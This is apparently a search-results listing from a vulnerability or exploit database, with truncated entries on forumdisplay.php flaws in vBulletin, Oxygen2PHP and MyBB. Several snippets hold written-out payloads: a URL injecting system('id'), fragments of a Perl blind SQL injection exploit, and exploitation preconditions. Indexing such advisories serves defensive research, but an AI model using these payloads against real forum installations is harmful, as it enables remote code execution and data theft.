40 matches found
EUVD-2004-0323
Malware in sbrugna...
vBulletin <= 3.0.4 "forumdisplay.php" Code Execution
No description provided by source. Exploit: ---------------- http://site/forumdisplay.php?GLOBALS=1&f=2&comma=.system'id'. Conditions: ---------------- 1st condition : $vboptions'showforumusers' == True , the admin must set showforumusers ON in vbulletin options. 2nd condition : $bbuserinfo'useri...
vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (part 2)
No description provided by source. ?php / vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleebatuk2.net First condition : $vboptions'showforumusers' == True , the admin must set showforumusers ON in vbulletin options. Second condition: $bbuserinfo'userid' == 0 , you must be an visitor/guest...
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0-Day Oxygen2PHP = 1.1.3 forumdisplay.php Remote Blind SQL Injection Exploit Coded By Dante90, WaRWolFz Crew Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my...
vBulletin 3.0.0 XSS Vulnerability
No description provided by source. Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 =============================================== WWW.sec-war.com =============================================== 3.0.0 - Introduction XSS scripts in the script search.php. I...
VBulletin 3.0 ForumDisplay.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9888/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'forumdisplay.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection ...
MyBB 1.6 Path Disclosure
Vulnerability ID: HTB22654 Reference: http://www.htbridge.ch/advisory/pathdisclosureinmybb.html Product: MyBB Vendor: MyBB http://www.mybb.com Vulnerable Version: 1.6 Vendor Notification: 13 October 2010 Vulnerability Type: Path disclosure Status: Not Fixed, Vendor Alerted, Awaiting Vendor Respon...
vBulletin 4.0.4 Code Execution
/======================================================================\ || || || Vurnerebility vBulletin - http://www.vbulletin.org || || Local or adserver Javascript,forumdisplay.php" Code Execution || || Version license 4.0.4 || || info set cookies, error issue & critical-information-disclosur...
vBulletin v4.0.4 adserver Javascript (forumdisplay.php) Code Execution
Exploit for php platform in category web applications ====================================================================== vBulletin v4.0.4 adserver Javascript forumdisplay.php Code Execution ======================================================================...
Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection
!/usr/bin/perl 0-Day Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./forumdisplay.php?fid=-1'+OR+1!=SELECT...
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
Exploit for php platform in category web applications ================================================================== Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$h...
vBulletin 3.0.0 XSS Vulnerability
Exploit for unknown platform in category web applications ================================= vBulletin 3.0.0 XSS Vulnerability ================================= Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 3.0.0 - Introduction XSS scripts in the script...
vBulletin 3.0.0 - Cross-Site Scripting
Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 =============================================== WWW.sec-war.com =============================================== 3.0.0 - Introduction XSS scripts in the script search.php. In fact, a hole through a browser...
vBulletin 3.0.0 - Cross-Site Scripting
vBulletin 3.0.0 - Cross-Site Scripting Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 =============================================== WWW.sec-war.com =============================================== 3.0.0 - Introduction XSS scripts in the script search.ph...
Oxygen2PHP 1.1.3 Blind SQL Injection
!/usr/bin/perl 0-Day Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./forumdisplay.php?fid=-1'+OR+1!=SELECT...
CVE-2008-0382
Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to 1 forumdisplay.php or 2 a results action in search.php...
MyBB forumdisplay.php 'sortby' Parameter Arbitrary PHP Code Execution
The version of MyBB installed on the remote host is affected by an arbitrary PHP code execution vulnerability due to improper sanitization of user-supplied input to the 'sortby' parameter of the forumdisplay.php script before using it in an eval statement to evaluate PHP code. A remote,...
MyBB < 1.2.11 forumdisplay.php sortby Parameter Command Execution
Binary data 4346.prm...
[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
waraxe-2008-SA061 - Remote Code Execution in MyBB 1.2.10 =============================================================================== Author: Janek Vind "waraxe" Independent discovery: koziolek Date: 16. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-61.html Target...
MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications ================================================================ MyBulletinBoard MyBB = 1.2.10 Multiple Remote Vulnerabilities ================================================================ waraxe-2008-SA061 - Remote Code Execution in My...